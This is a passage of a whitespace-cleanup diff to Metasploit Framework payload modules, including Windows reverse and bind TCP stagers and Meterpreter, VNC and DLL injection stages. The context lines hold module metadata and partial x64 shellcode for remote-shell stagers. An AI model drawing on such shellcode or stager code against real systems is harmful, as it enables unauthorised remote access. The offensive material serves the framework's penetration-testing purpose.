licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse All-Port TCP Stager', @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, - 'Payload' => + 'Payload' => # Length: 294 bytes # Port Offset: 202 # Host Offset: 195 @@ -61,7 +61,7 @@ module Metasploit3 } )) end - + def self.handler_type return "reverse_tcp" end diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index 7b1eaeee7f..942a4ce91f 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -37,7 +37,7 @@ module Metasploit3 'LPORT' => [ 232, 'n' ] }, 'RequiresMidstager' => false, - 'Payload' => + 'Payload' => "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index 5de8edeb94..c22d4adf6a 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Reverse TCP Stager', @@ -38,7 +38,7 @@ module Metasploit3 'LHOST' => [ 234, 'ADDR' ] }, 'RequiresMidstager' => false, - 'Payload' => + 'Payload' => "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index 73742558f5..6bba99f073 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index 4ec8f04f63..c0b8587903 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index d8129984a3..0c5f7ba401 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index fd5d48786f..ffa306ec19 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/windows/patchupvncinject.rb b/modules/payloads/stages/windows/patchupvncinject.rb index 71a77bf857..3b9bcab1b2 100644 --- a/modules/payloads/stages/windows/patchupvncinject.rb +++ b/modules/payloads/stages/windows/patchupvncinject.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -110,7 +110,7 @@ module Metasploit3 print_status("Launched vnciewer in the background.") end end - + super end